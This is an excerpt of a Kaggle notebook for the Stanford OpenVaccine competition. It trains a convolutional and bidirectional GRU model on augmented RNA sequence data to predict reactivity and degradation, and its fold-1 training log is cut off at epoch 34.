database_base_path = '/kaggle/input/stanford-covid-vaccine/'
train = pd.read_json(database_base_path + 'train.json', lines=True)
test = pd.read_json(database_base_path + 'test.json', lines=True)
print('Train samples: %d' % len(train))
display(train.head())
print(f'Test samples: {len(test)}')
display(test.head())
###Output
Train samples: 2400
###Markdown
Data augmentation
###Code
def aug_data(df):
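# aug_df (loaded below from the augmented-data CSV) appears to hold alternative
# structure / predicted_loop_type annotations for the same sequences; this function
# merges them onto the matching original rows and appends them to df, flagging the
# new rows through the 'augmented' column.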
target_df = df.copy()
new_df = aug_df[aug_df['id'].isin(target_df['id'])]
del target_df['structure']
del target_df['predicted_loop_type']
new_df = new_df.merge(target_df, on=['id','sequence'], how='left')
df['cnt'] = df['id'].map(new_df[['id','cnt']].set_index('id').to_dict()['cnt'])
df['log_gamma'] = 100
df['score'] = 1.0
new_df['augmented'] = True
df['augmented'] = False
df = df.append(new_df[df.columns])
return df
# Augmented data
aug_df = pd.read_csv('/kaggle/input/augmented-data-for-stanford-covid-vaccine/48k_augment.csv')
print(f'Augmented samples: {len(aug_df)}')
display(aug_df.head())
print(f"Samples in train before augmentation: {len(train)}")
# print(f"Samples in test before augmentation: {len(test)}")
train = aug_data(train)
train.drop('index', axis=1, inplace=True)
train = train.reset_index()
# test = aug_data(test)
print(f"Samples in train after augmentation: {len(train)}")
# print(f"Samples in test after augmentation: {len(test)}")
print(f"Unique id in train: {len(train['id'].unique())}")
print(f"Unique sequences in train: {len(train['sequence'].unique())}")
print(f"Unique structure in train: {len(train['structure'].unique())}")
print(f"Unique predicted_loop_type in train: {len(train['predicted_loop_type'].unique())}")
# print(f"Unique sequences in test: {len(test['sequence'].unique())}")
###Output
Augmented samples: 48401
###Markdown
Auxiliary functions
###Code
def get_dataset(x, y=None, sample_weights=None, labeled=True, shuffled=True, repeated=False, batch_size=32, buffer_size=-1, seed=0):
input_map = {'inputs_seq': x['sequence'],
'inputs_struct': x['structure'],
'inputs_loop': x['predicted_loop_type'],
'inputs_bpps_max': x['bpps_max'],
'inputs_bpps_sum': x['bpps_sum'],
'inputs_bpps_scaled': x['bpps_scaled']}
if labeled:
output_map = {'output_react': y['reactivity'],
'output_bg_ph': y['deg_Mg_pH10'],
'output_ph': y['deg_pH10'],
'output_mg_c': y['deg_Mg_50C'],
'output_c': y['deg_50C']}
if sample_weights is not None:
dataset = tf.data.Dataset.from_tensor_slices((input_map, output_map, sample_weights))
else:
dataset = tf.data.Dataset.from_tensor_slices((input_map, output_map))
else:
dataset = tf.data.Dataset.from_tensor_slices((input_map))
if repeated:
dataset = dataset.repeat()
if shuffled:
dataset = dataset.shuffle(2048, seed=seed)
dataset = dataset.batch(batch_size)
dataset = dataset.prefetch(buffer_size)
return dataset
def get_dataset_sampling(x, y=None, sample_weights=None, labeled=True, shuffled=True, repeated=False, batch_size=32, buffer_size=-1, seed=0):
input_map = {'inputs_seq': x['sequence'],
'inputs_struct': x['structure'],
'inputs_loop': x['predicted_loop_type'],
'inputs_bpps_max': x['bpps_max'],
'inputs_bpps_sum': x['bpps_sum'],
'inputs_bpps_scaled': x['bpps_scaled']}
if labeled:
output_map = {'output_react': y['reactivity'],
'output_bg_ph': y['deg_Mg_pH10'],
'output_ph': y['deg_pH10'],
'output_mg_c': y['deg_Mg_50C'],
'output_c': y['deg_50C']}
if sample_weights is not None:
dataset = tf.data.Dataset.from_tensor_slices((input_map, output_map, sample_weights))
else:
dataset = tf.data.Dataset.from_tensor_slices((input_map, output_map))
else:
dataset = tf.data.Dataset.from_tensor_slices((input_map))
if repeated:
dataset = dataset.repeat()
if shuffled:
dataset = dataset.shuffle(2048, seed=seed)
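# Note: unlike get_dataset, this variant returns an unbatched dataset, since
# tf.data.experimental.sample_from_datasets interleaves individual examples;
# batching and prefetching are applied afterwards in the training loop below.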
return dataset
###Output
_____no_output_____
###Markdown
Pre-process
###Code
# Add bpps as features
train = add_bpps_features(train, database_base_path)
test = add_bpps_features(test, database_base_path)
feature_cols = ['sequence', 'structure', 'predicted_loop_type', 'bpps_max', 'bpps_sum', 'bpps_scaled']
pred_cols = ['reactivity', 'deg_Mg_pH10', 'deg_pH10', 'deg_Mg_50C', 'deg_50C']
encoder_list = [token2int_seq, token2int_struct, token2int_loop, None, None, None]
public_test = test.query("seq_length == 107").copy()
private_test = test.query("seq_length == 130").copy()
x_test_public = get_features_dict(public_test, feature_cols, encoder_list, public_test.index)
x_test_private = get_features_dict(private_test, feature_cols, encoder_list, private_test.index)
# To use as stratified col
train['signal_to_noise_int'] = train['signal_to_noise'].astype(int)
###Output
_____no_output_____
###Markdown
Model
###Code
def model_fn(hidden_dim=384, dropout=.5, pred_len=68, n_outputs=5):
inputs_seq = L.Input(shape=(None, 1), name='inputs_seq')
inputs_struct = L.Input(shape=(None, 1), name='inputs_struct')
inputs_loop = L.Input(shape=(None, 1), name='inputs_loop')
inputs_bpps_max = L.Input(shape=(None, 1), name='inputs_bpps_max')
inputs_bpps_sum = L.Input(shape=(None, 1), name='inputs_bpps_sum')
inputs_bpps_scaled = L.Input(shape=(None, 1), name='inputs_bpps_scaled')
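# The categorical inputs arrive integer-encoded with shape (batch, seq_len, 1);
# _one_hot expands them to (batch, seq_len, num_classes) one-hot vectors.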
def _one_hot(x, num_classes):
return K.squeeze(K.one_hot(K.cast(x, 'uint8'), num_classes=num_classes), axis=2)
ohe_seq = L.Lambda(_one_hot, arguments={'num_classes': len(token2int_seq)}, input_shape=(None, 1))(inputs_seq)
ohe_struct = L.Lambda(_one_hot, arguments={'num_classes': len(token2int_struct)}, input_shape=(None, 1))(inputs_struct)
ohe_loop = L.Lambda(_one_hot, arguments={'num_classes': len(token2int_loop)}, input_shape=(None, 1))(inputs_loop)
### Encoder block
# Conv block
conv_seq = L.Conv1D(filters=64, kernel_size=3, padding='same')(ohe_seq)
conv_struct = L.Conv1D(filters=64, kernel_size=3, padding='same')(ohe_struct)
conv_loop = L.Conv1D(filters=64, kernel_size=3, padding='same')(ohe_loop)
conv_bpps_max = L.Conv1D(filters=64, kernel_size=3, padding='same')(inputs_bpps_max)
conv_bpps_sum = L.Conv1D(filters=64, kernel_size=3, padding='same')(inputs_bpps_sum)
conv_bpps_scaled = L.Conv1D(filters=64, kernel_size=3, padding='same')(inputs_bpps_scaled)
x_concat = L.concatenate([conv_seq, conv_struct, conv_loop, conv_bpps_max,
conv_bpps_sum, conv_bpps_scaled], axis=-1, name='conv_concatenate')
# Recurrent block
encoder, encoder_state_f, encoder_state_b = L.Bidirectional(L.GRU(hidden_dim, dropout=dropout, return_sequences=True,
return_state=True, kernel_initializer='orthogonal'),
name='Encoder_RNN')(x_concat)
### Decoder block
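# The decoder GRU consumes the full encoder output sequence and is initialized
# with the encoder's final forward/backward states, seq2seq-style.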
decoder = L.Bidirectional(L.GRU(hidden_dim, dropout=dropout, return_sequences=True, kernel_initializer='orthogonal'),
name='Decoder')(encoder, initial_state=[encoder_state_f, encoder_state_b])
# Since we are only making predictions on the first part of each sequence, we have to truncate it
decoder_truncated = decoder[:, :pred_len]
output_react = L.Dense(1, name='output_react')(decoder_truncated)
output_bg_ph = L.Dense(1, name='output_bg_ph')(decoder_truncated)
output_ph = L.Dense(1, name='output_ph')(decoder_truncated)
output_mg_c = L.Dense(1, name='output_mg_c')(decoder_truncated)
output_c = L.Dense(1, name='output_c')(decoder_truncated)
model = Model(inputs=[inputs_seq, inputs_struct, inputs_loop, inputs_bpps_max, inputs_bpps_sum, inputs_bpps_scaled],
outputs=[output_react, output_bg_ph, output_ph, output_mg_c, output_c])
opt = optimizers.Adam(learning_rate=config['LEARNING_RATE'])
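# MCRMSE is imported from openvaccine_scripts (see the imports above); it is
# presumably the competition metric, i.e. the RMSE computed per target column and
# then averaged. The loss_weights below up-weight reactivity, deg_Mg_pH10 and
# deg_Mg_50C, presumably because those are the columns scored by the competition.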
model.compile(optimizer=opt, loss={'output_react': MCRMSE,
'output_bg_ph': MCRMSE,
'output_ph': MCRMSE,
'output_mg_c': MCRMSE,
'output_c': MCRMSE},
loss_weights={'output_react': 2.,
'output_bg_ph': 2.,
'output_ph': 1.,
'output_mg_c': 2.,
'output_c': 1.})
return model
model = model_fn()
model.summary()
###Output
Model: "functional_1"
__________________________________________________________________________________________________
Layer (type) Output Shape Param # Connected to
==================================================================================================
inputs_seq (InputLayer) [(None, None, 1)] 0
__________________________________________________________________________________________________
inputs_struct (InputLayer) [(None, None, 1)] 0
__________________________________________________________________________________________________
inputs_loop (InputLayer) [(None, None, 1)] 0
__________________________________________________________________________________________________
lambda (Lambda) (None, None, 4) 0 inputs_seq[0][0]
__________________________________________________________________________________________________
lambda_1 (Lambda) (None, None, 3) 0 inputs_struct[0][0]
__________________________________________________________________________________________________
lambda_2 (Lambda) (None, None, 7) 0 inputs_loop[0][0]
__________________________________________________________________________________________________
inputs_bpps_max (InputLayer) [(None, None, 1)] 0
__________________________________________________________________________________________________
inputs_bpps_sum (InputLayer) [(None, None, 1)] 0
__________________________________________________________________________________________________
inputs_bpps_scaled (InputLayer) [(None, None, 1)] 0
__________________________________________________________________________________________________
conv1d (Conv1D) (None, None, 64) 832 lambda[0][0]
__________________________________________________________________________________________________
conv1d_1 (Conv1D) (None, None, 64) 640 lambda_1[0][0]
__________________________________________________________________________________________________
conv1d_2 (Conv1D) (None, None, 64) 1408 lambda_2[0][0]
__________________________________________________________________________________________________
conv1d_3 (Conv1D) (None, None, 64) 256 inputs_bpps_max[0][0]
__________________________________________________________________________________________________
conv1d_4 (Conv1D) (None, None, 64) 256 inputs_bpps_sum[0][0]
__________________________________________________________________________________________________
conv1d_5 (Conv1D) (None, None, 64) 256 inputs_bpps_scaled[0][0]
__________________________________________________________________________________________________
conv_concatenate (Concatenate) (None, None, 384) 0 conv1d[0][0]
conv1d_1[0][0]
conv1d_2[0][0]
conv1d_3[0][0]
conv1d_4[0][0]
conv1d_5[0][0]
__________________________________________________________________________________________________
Encoder_RNN (Bidirectional) [(None, None, 768), 1774080 conv_concatenate[0][0]
__________________________________________________________________________________________________
Decoder (Bidirectional) (None, None, 768) 2658816 Encoder_RNN[0][0]
Encoder_RNN[0][1]
Encoder_RNN[0][2]
__________________________________________________________________________________________________
tf_op_layer_strided_slice (Tens [(None, None, 768)] 0 Decoder[0][0]
__________________________________________________________________________________________________
output_react (Dense) (None, None, 1) 769 tf_op_layer_strided_slice[0][0]
__________________________________________________________________________________________________
output_bg_ph (Dense) (None, None, 1) 769 tf_op_layer_strided_slice[0][0]
__________________________________________________________________________________________________
output_ph (Dense) (None, None, 1) 769 tf_op_layer_strided_slice[0][0]
__________________________________________________________________________________________________
output_mg_c (Dense) (None, None, 1) 769 tf_op_layer_strided_slice[0][0]
__________________________________________________________________________________________________
output_c (Dense) (None, None, 1) 769 tf_op_layer_strided_slice[0][0]
==================================================================================================
Total params: 4,440,389
Trainable params: 4,440,389
Non-trainable params: 0
__________________________________________________________________________________________________
###Markdown
Training
###Code
AUTO = tf.data.experimental.AUTOTUNE
skf = GroupKFold(n_splits=config['N_FOLDS'])
history_list = []
oof = train[['id', 'SN_filter', 'signal_to_noise'] + pred_cols].copy()
oof_preds = np.zeros((len(train), 68, len(pred_cols)))
test_public_preds = np.zeros((len(public_test), config['PB_SEQ_LEN'], len(pred_cols)))
test_private_preds = np.zeros((len(private_test), config['PV_SEQ_LEN'], len(pred_cols)))
for fold,(train_idx, valid_idx) in enumerate(skf.split(train, train['signal_to_noise_int'], train['id'])):
if fold >= config['N_USED_FOLDS']:
break
print(f'\nFOLD: {fold+1}')
# Validation uses only clean (SN_filter == 1), non-augmented samples
valid_clean_idxs = np.intersect1d(train[(train['SN_filter'] == 1) &
(train['augmented'] == False)].index, valid_idx)
### Create datasets
# x_train = get_features_dict(train, feature_cols, encoder_list, train_idx)
# y_train = get_targets_dict(train, pred_cols, train_idx)
# w_train = np.log(train.iloc[train_idx]['signal_to_noise'].values+1.2)+1
x_valid = get_features_dict(train, feature_cols, encoder_list, valid_clean_idxs)
y_valid = get_targets_dict(train, pred_cols, valid_clean_idxs)
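# Sample weights: log(signal_to_noise + 1.2) + 1 gives cleaner, higher
# signal-to-noise measurements a larger contribution to the loss (the same
# weighting is applied to the training subsets below).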
w_valid = np.log(train.iloc[valid_clean_idxs]['signal_to_noise'].values+1.2)+1
# train_ds = get_dataset(x_train, y_train, w_train, labeled=True, shuffled=True, batch_size=config['BATCH_SIZE'], buffer_size=AUTO, seed=SEED)
valid_ds = get_dataset(x_valid, y_valid, w_valid, labeled=True, shuffled=False, batch_size=config['BATCH_SIZE'], buffer_size=AUTO, seed=SEED)
oof_ds = get_dataset(get_features_dict(train, feature_cols, encoder_list, valid_idx), labeled=False, shuffled=False, batch_size=config['BATCH_SIZE'], buffer_size=AUTO, seed=SEED)
test_public_ds = get_dataset(x_test_public, labeled=False, shuffled=False, batch_size=config['BATCH_SIZE'], buffer_size=AUTO, seed=SEED)
test_private_ds = get_dataset(x_test_private, labeled=False, shuffled=False, batch_size=config['BATCH_SIZE'], buffer_size=AUTO, seed=SEED)
# Split the training fold into original (non-augmented) and augmented subsets for balanced sampling
normal_idxs = np.intersect1d(train[train['augmented'] == False].index, train_idx)
x_train_normal = get_features_dict(train, feature_cols, encoder_list, normal_idxs)
y_train_normal = get_targets_dict(train, pred_cols, normal_idxs)
w_train_normal = np.log(train.iloc[normal_idxs]['signal_to_noise'].values+1.2)+1
normal_ds = get_dataset_sampling(x_train_normal, y_train_normal, w_train_normal, labeled=True, shuffled=True,
repeated=True, batch_size=config['BATCH_SIZE'], buffer_size=AUTO, seed=SEED)
augmented_idxs = np.intersect1d(train[train['augmented'] == True].index, train_idx)
x_train_augmented = get_features_dict(train, feature_cols, encoder_list, augmented_idxs)
y_train_augmented = get_targets_dict(train, pred_cols, augmented_idxs)
w_train_augmented = np.log(train.iloc[augmented_idxs]['signal_to_noise'].values+1.2)+1
augmented_ds = get_dataset_sampling(x_train_augmented, y_train_augmented, w_train_augmented, labeled=True, shuffled=True,
repeated=True, batch_size=config['BATCH_SIZE'], buffer_size=AUTO, seed=SEED)
# Resampled TF Dataset
resampled_ds = tf.data.experimental.sample_from_datasets([normal_ds, augmented_ds], weights=[.5, .5])
resampled_ds = resampled_ds.batch(config['BATCH_SIZE']).prefetch(AUTO)
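# Each batch is drawn roughly 50/50 from the original and augmented pools; with
# steps_per_epoch = len(normal_idxs) // (BATCH_SIZE * 0.5), one epoch covers about
# one pass over the original samples plus an equal amount of augmented data.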
### Model
K.clear_session()
model = model_fn()
model_path = f'model_{fold}.h5'
es = EarlyStopping(monitor='val_loss', mode='min', patience=config['ES_PATIENCE'], restore_best_weights=True, verbose=1)
rlrp = ReduceLROnPlateau(monitor='val_loss', mode='min', factor=0.1, patience=5, verbose=1)
### Train
history = model.fit(resampled_ds,
validation_data=valid_ds,
callbacks=[es, rlrp],
epochs=config['EPOCHS'],
batch_size=config['BATCH_SIZE'],
steps_per_epoch=int(len(normal_idxs)//(config['BATCH_SIZE']* .5)),
verbose=2).history
history_list.append(history)
# Save last model weights
model.save_weights(model_path)
### Inference
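# model.predict returns a list of five (n_samples, pred_len, 1) arrays, one per
# target; stacking, reshaping and transposing yields (n_samples, pred_len, 5).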
oof_ds_preds = np.array(model.predict(oof_ds)).reshape((len(pred_cols), len(valid_idx), 68)).transpose((1, 2, 0))
oof_preds[valid_idx] = oof_ds_preds
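# For the test sets the graph is rebuilt with a longer pred_len and the trained
# weights are reloaded: every layer is sequence-length agnostic, so the same
# weights apply to the 107- and 130-base inputs. Fold predictions are averaged
# by accumulating with weight 1 / N_USED_FOLDS.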
# Short sequence (public test)
model = model_fn(pred_len=config['PB_SEQ_LEN'])
model.load_weights(model_path)
test_public_ds_preds = np.array(model.predict(test_public_ds)).reshape((len(pred_cols), len(public_test),
config['PB_SEQ_LEN'])).transpose((1, 2, 0))
test_public_preds += test_public_ds_preds * (1 / config['N_USED_FOLDS'])
# Long sequence (private test)
model = model_fn(pred_len=config['PV_SEQ_LEN'])
model.load_weights(model_path)
test_private_ds_preds = np.array(model.predict(test_private_ds)).reshape((len(pred_cols), len(private_test),
config['PV_SEQ_LEN'])).transpose((1, 2, 0))
test_private_preds += test_private_ds_preds * (1 / config['N_USED_FOLDS'])
###Output
FOLD: 1
Epoch 1/70
120/120 - 9s - loss: 8.8397 - output_react_loss: 0.9259 - output_bg_ph_loss: 1.1574 - output_ph_loss: 1.3049 - output_mg_c_loss: 1.1250 - output_c_loss: 1.1182 - val_loss: 6.6835 - val_output_react_loss: 0.7664 - val_output_bg_ph_loss: 0.9430 - val_output_ph_loss: 0.8700 - val_output_mg_c_loss: 0.8241 - val_output_c_loss: 0.7464
Epoch 2/70
120/120 - 7s - loss: 7.6376 - output_react_loss: 0.8081 - output_bg_ph_loss: 0.9683 - output_ph_loss: 1.1501 - output_mg_c_loss: 0.9694 - output_c_loss: 0.9957 - val_loss: 6.0817 - val_output_react_loss: 0.6944 - val_output_bg_ph_loss: 0.8665 - val_output_ph_loss: 0.8055 - val_output_mg_c_loss: 0.7370 - val_output_c_loss: 0.6802
Epoch 3/70
120/120 - 7s - loss: 7.1648 - output_react_loss: 0.7737 - output_bg_ph_loss: 0.9002 - output_ph_loss: 1.1059 - output_mg_c_loss: 0.8889 - output_c_loss: 0.9332 - val_loss: 5.6689 - val_output_react_loss: 0.6572 - val_output_bg_ph_loss: 0.8071 - val_output_ph_loss: 0.7491 - val_output_mg_c_loss: 0.6815 - val_output_c_loss: 0.6283
Epoch 4/70
120/120 - 7s - loss: 6.6211 - output_react_loss: 0.7340 - output_bg_ph_loss: 0.8261 - output_ph_loss: 1.0016 - output_mg_c_loss: 0.8152 - output_c_loss: 0.8689 - val_loss: 5.4716 - val_output_react_loss: 0.6421 - val_output_bg_ph_loss: 0.7689 - val_output_ph_loss: 0.7378 - val_output_mg_c_loss: 0.6485 - val_output_c_loss: 0.6149
Epoch 5/70
120/120 - 7s - loss: 6.4536 - output_react_loss: 0.7158 - output_bg_ph_loss: 0.8024 - output_ph_loss: 0.9987 - output_mg_c_loss: 0.7880 - output_c_loss: 0.8425 - val_loss: 5.3014 - val_output_react_loss: 0.6178 - val_output_bg_ph_loss: 0.7454 - val_output_ph_loss: 0.7235 - val_output_mg_c_loss: 0.6300 - val_output_c_loss: 0.5915
Epoch 6/70
120/120 - 7s - loss: 6.1134 - output_react_loss: 0.6714 - output_bg_ph_loss: 0.7681 - output_ph_loss: 0.9380 - output_mg_c_loss: 0.7443 - output_c_loss: 0.8078 - val_loss: 5.1079 - val_output_react_loss: 0.5890 - val_output_bg_ph_loss: 0.7184 - val_output_ph_loss: 0.6878 - val_output_mg_c_loss: 0.6115 - val_output_c_loss: 0.5824
Epoch 7/70
120/120 - 7s - loss: 5.9865 - output_react_loss: 0.6653 - output_bg_ph_loss: 0.7482 - output_ph_loss: 0.9160 - output_mg_c_loss: 0.7237 - output_c_loss: 0.7961 - val_loss: 5.0390 - val_output_react_loss: 0.5902 - val_output_bg_ph_loss: 0.7151 - val_output_ph_loss: 0.6802 - val_output_mg_c_loss: 0.5866 - val_output_c_loss: 0.5750
Epoch 8/70
120/120 - 7s - loss: 5.8787 - output_react_loss: 0.6528 - output_bg_ph_loss: 0.7308 - output_ph_loss: 0.9134 - output_mg_c_loss: 0.7059 - output_c_loss: 0.7861 - val_loss: 4.9266 - val_output_react_loss: 0.5709 - val_output_bg_ph_loss: 0.7068 - val_output_ph_loss: 0.6618 - val_output_mg_c_loss: 0.5758 - val_output_c_loss: 0.5577
Epoch 9/70
120/120 - 7s - loss: 5.8656 - output_react_loss: 0.6562 - output_bg_ph_loss: 0.7181 - output_ph_loss: 0.9100 - output_mg_c_loss: 0.7022 - output_c_loss: 0.8025 - val_loss: 4.9422 - val_output_react_loss: 0.5764 - val_output_bg_ph_loss: 0.7020 - val_output_ph_loss: 0.6640 - val_output_mg_c_loss: 0.5782 - val_output_c_loss: 0.5650
Epoch 10/70
120/120 - 7s - loss: 5.7170 - output_react_loss: 0.6373 - output_bg_ph_loss: 0.7020 - output_ph_loss: 0.8879 - output_mg_c_loss: 0.6831 - output_c_loss: 0.7843 - val_loss: 4.8992 - val_output_react_loss: 0.5714 - val_output_bg_ph_loss: 0.6902 - val_output_ph_loss: 0.6615 - val_output_mg_c_loss: 0.5746 - val_output_c_loss: 0.5652
Epoch 11/70
120/120 - 7s - loss: 5.3053 - output_react_loss: 0.5975 - output_bg_ph_loss: 0.6579 - output_ph_loss: 0.8233 - output_mg_c_loss: 0.6250 - output_c_loss: 0.7213 - val_loss: 4.8023 - val_output_react_loss: 0.5606 - val_output_bg_ph_loss: 0.6868 - val_output_ph_loss: 0.6482 - val_output_mg_c_loss: 0.5583 - val_output_c_loss: 0.5427
Epoch 12/70
120/120 - 7s - loss: 5.5135 - output_react_loss: 0.6187 - output_bg_ph_loss: 0.6695 - output_ph_loss: 0.8676 - output_mg_c_loss: 0.6550 - output_c_loss: 0.7598 - val_loss: 4.7526 - val_output_react_loss: 0.5582 - val_output_bg_ph_loss: 0.6705 - val_output_ph_loss: 0.6371 - val_output_mg_c_loss: 0.5555 - val_output_c_loss: 0.5471
Epoch 13/70
120/120 - 7s - loss: 5.2029 - output_react_loss: 0.5775 - output_bg_ph_loss: 0.6397 - output_ph_loss: 0.8221 - output_mg_c_loss: 0.6133 - output_c_loss: 0.7198 - val_loss: 4.7717 - val_output_react_loss: 0.5526 - val_output_bg_ph_loss: 0.6807 - val_output_ph_loss: 0.6389 - val_output_mg_c_loss: 0.5611 - val_output_c_loss: 0.5438
Epoch 14/70
120/120 - 7s - loss: 5.2533 - output_react_loss: 0.5847 - output_bg_ph_loss: 0.6349 - output_ph_loss: 0.8446 - output_mg_c_loss: 0.6162 - output_c_loss: 0.7371 - val_loss: 4.7730 - val_output_react_loss: 0.5559 - val_output_bg_ph_loss: 0.6747 - val_output_ph_loss: 0.6340 - val_output_mg_c_loss: 0.5644 - val_output_c_loss: 0.5489
Epoch 15/70
120/120 - 7s - loss: 5.0608 - output_react_loss: 0.5679 - output_bg_ph_loss: 0.6109 - output_ph_loss: 0.8029 - output_mg_c_loss: 0.5952 - output_c_loss: 0.7100 - val_loss: 4.7315 - val_output_react_loss: 0.5479 - val_output_bg_ph_loss: 0.6692 - val_output_ph_loss: 0.6356 - val_output_mg_c_loss: 0.5578 - val_output_c_loss: 0.5461
Epoch 16/70
120/120 - 7s - loss: 5.0519 - output_react_loss: 0.5679 - output_bg_ph_loss: 0.6056 - output_ph_loss: 0.8057 - output_mg_c_loss: 0.5897 - output_c_loss: 0.7197 - val_loss: 4.7195 - val_output_react_loss: 0.5459 - val_output_bg_ph_loss: 0.6713 - val_output_ph_loss: 0.6346 - val_output_mg_c_loss: 0.5543 - val_output_c_loss: 0.5420
Epoch 17/70
120/120 - 7s - loss: 4.9197 - output_react_loss: 0.5442 - output_bg_ph_loss: 0.5949 - output_ph_loss: 0.7841 - output_mg_c_loss: 0.5771 - output_c_loss: 0.7033 - val_loss: 4.7081 - val_output_react_loss: 0.5398 - val_output_bg_ph_loss: 0.6694 - val_output_ph_loss: 0.6330 - val_output_mg_c_loss: 0.5537 - val_output_c_loss: 0.5494
Epoch 18/70
120/120 - 7s - loss: 4.8407 - output_react_loss: 0.5387 - output_bg_ph_loss: 0.5863 - output_ph_loss: 0.7697 - output_mg_c_loss: 0.5651 - output_c_loss: 0.6909 - val_loss: 4.7479 - val_output_react_loss: 0.5473 - val_output_bg_ph_loss: 0.6786 - val_output_ph_loss: 0.6390 - val_output_mg_c_loss: 0.5585 - val_output_c_loss: 0.5402
Epoch 19/70
120/120 - 7s - loss: 4.9427 - output_react_loss: 0.5432 - output_bg_ph_loss: 0.5823 - output_ph_loss: 0.8134 - output_mg_c_loss: 0.5743 - output_c_loss: 0.7299 - val_loss: 4.6847 - val_output_react_loss: 0.5418 - val_output_bg_ph_loss: 0.6676 - val_output_ph_loss: 0.6277 - val_output_mg_c_loss: 0.5495 - val_output_c_loss: 0.5391
Epoch 20/70
120/120 - 7s - loss: 4.7518 - output_react_loss: 0.5295 - output_bg_ph_loss: 0.5623 - output_ph_loss: 0.7691 - output_mg_c_loss: 0.5556 - output_c_loss: 0.6880 - val_loss: 4.6505 - val_output_react_loss: 0.5397 - val_output_bg_ph_loss: 0.6606 - val_output_ph_loss: 0.6247 - val_output_mg_c_loss: 0.5449 - val_output_c_loss: 0.5354
Epoch 21/70
120/120 - 7s - loss: 4.5799 - output_react_loss: 0.5129 - output_bg_ph_loss: 0.5427 - output_ph_loss: 0.7412 - output_mg_c_loss: 0.5302 - output_c_loss: 0.6670 - val_loss: 4.6555 - val_output_react_loss: 0.5363 - val_output_bg_ph_loss: 0.6600 - val_output_ph_loss: 0.6279 - val_output_mg_c_loss: 0.5457 - val_output_c_loss: 0.5435
Epoch 22/70
120/120 - 7s - loss: 4.6793 - output_react_loss: 0.5103 - output_bg_ph_loss: 0.5511 - output_ph_loss: 0.7675 - output_mg_c_loss: 0.5492 - output_c_loss: 0.6907 - val_loss: 4.6583 - val_output_react_loss: 0.5397 - val_output_bg_ph_loss: 0.6578 - val_output_ph_loss: 0.6263 - val_output_mg_c_loss: 0.5486 - val_output_c_loss: 0.5399
Epoch 23/70
120/120 - 7s - loss: 4.7231 - output_react_loss: 0.5174 - output_bg_ph_loss: 0.5518 - output_ph_loss: 0.7815 - output_mg_c_loss: 0.5493 - output_c_loss: 0.7045 - val_loss: 4.6738 - val_output_react_loss: 0.5383 - val_output_bg_ph_loss: 0.6693 - val_output_ph_loss: 0.6249 - val_output_mg_c_loss: 0.5477 - val_output_c_loss: 0.5383
Epoch 24/70
120/120 - 7s - loss: 4.5230 - output_react_loss: 0.4920 - output_bg_ph_loss: 0.5392 - output_ph_loss: 0.7414 - output_mg_c_loss: 0.5234 - output_c_loss: 0.6726 - val_loss: 4.7325 - val_output_react_loss: 0.5448 - val_output_bg_ph_loss: 0.6731 - val_output_ph_loss: 0.6377 - val_output_mg_c_loss: 0.5582 - val_output_c_loss: 0.5427
Epoch 25/70
Epoch 00025: ReduceLROnPlateau reducing learning rate to 0.00010000000474974513.
120/120 - 7s - loss: 4.3904 - output_react_loss: 0.4821 - output_bg_ph_loss: 0.5178 - output_ph_loss: 0.7217 - output_mg_c_loss: 0.5074 - output_c_loss: 0.6540 - val_loss: 4.6522 - val_output_react_loss: 0.5357 - val_output_bg_ph_loss: 0.6626 - val_output_ph_loss: 0.6223 - val_output_mg_c_loss: 0.5502 - val_output_c_loss: 0.5329
Epoch 26/70
120/120 - 7s - loss: 4.5230 - output_react_loss: 0.4889 - output_bg_ph_loss: 0.5207 - output_ph_loss: 0.7528 - output_mg_c_loss: 0.5257 - output_c_loss: 0.6996 - val_loss: 4.5565 - val_output_react_loss: 0.5271 - val_output_bg_ph_loss: 0.6478 - val_output_ph_loss: 0.6130 - val_output_mg_c_loss: 0.5335 - val_output_c_loss: 0.5268
Epoch 27/70
120/120 - 7s - loss: 4.1334 - output_react_loss: 0.4538 - output_bg_ph_loss: 0.4856 - output_ph_loss: 0.6847 - output_mg_c_loss: 0.4752 - output_c_loss: 0.6195 - val_loss: 4.5609 - val_output_react_loss: 0.5284 - val_output_bg_ph_loss: 0.6479 - val_output_ph_loss: 0.6152 - val_output_mg_c_loss: 0.5330 - val_output_c_loss: 0.5270
Epoch 28/70
120/120 - 7s - loss: 4.2748 - output_react_loss: 0.4703 - output_bg_ph_loss: 0.4885 - output_ph_loss: 0.7147 - output_mg_c_loss: 0.4972 - output_c_loss: 0.6479 - val_loss: 4.5574 - val_output_react_loss: 0.5275 - val_output_bg_ph_loss: 0.6485 - val_output_ph_loss: 0.6142 - val_output_mg_c_loss: 0.5327 - val_output_c_loss: 0.5260
Epoch 29/70
120/120 - 7s - loss: 4.2394 - output_react_loss: 0.4597 - output_bg_ph_loss: 0.4884 - output_ph_loss: 0.7139 - output_mg_c_loss: 0.4878 - output_c_loss: 0.6537 - val_loss: 4.5584 - val_output_react_loss: 0.5277 - val_output_bg_ph_loss: 0.6478 - val_output_ph_loss: 0.6133 - val_output_mg_c_loss: 0.5334 - val_output_c_loss: 0.5274
Epoch 30/70
120/120 - 7s - loss: 4.2578 - output_react_loss: 0.4595 - output_bg_ph_loss: 0.4945 - output_ph_loss: 0.7195 - output_mg_c_loss: 0.4905 - output_c_loss: 0.6493 - val_loss: 4.5614 - val_output_react_loss: 0.5288 - val_output_bg_ph_loss: 0.6473 - val_output_ph_loss: 0.6159 - val_output_mg_c_loss: 0.5329 - val_output_c_loss: 0.5275
Epoch 31/70
120/120 - 7s - loss: 4.3131 - output_react_loss: 0.4688 - output_bg_ph_loss: 0.4934 - output_ph_loss: 0.7268 - output_mg_c_loss: 0.4992 - output_c_loss: 0.6634 - val_loss: 4.5532 - val_output_react_loss: 0.5268 - val_output_bg_ph_loss: 0.6464 - val_output_ph_loss: 0.6143 - val_output_mg_c_loss: 0.5329 - val_output_c_loss: 0.5268
Epoch 32/70
120/120 - 7s - loss: 4.1724 - output_react_loss: 0.4482 - output_bg_ph_loss: 0.4822 - output_ph_loss: 0.7072 - output_mg_c_loss: 0.4776 - output_c_loss: 0.6491 - val_loss: 4.5556 - val_output_react_loss: 0.5283 - val_output_bg_ph_loss: 0.6463 - val_output_ph_loss: 0.6134 - val_output_mg_c_loss: 0.5332 - val_output_c_loss: 0.5266
Epoch 33/70
120/120 - 7s - loss: 4.0777 - output_react_loss: 0.4427 - output_bg_ph_loss: 0.4760 - output_ph_loss: 0.6814 - output_mg_c_loss: 0.4685 - output_c_loss: 0.6219 - val_loss: 4.5641 - val_output_react_loss: 0.5288 - val_output_bg_ph_loss: 0.6476 - val_output_ph_loss: 0.6147 - val_output_mg_c_loss: 0.5346 - val_output_c_loss: 0.5273
Epoch 34/70
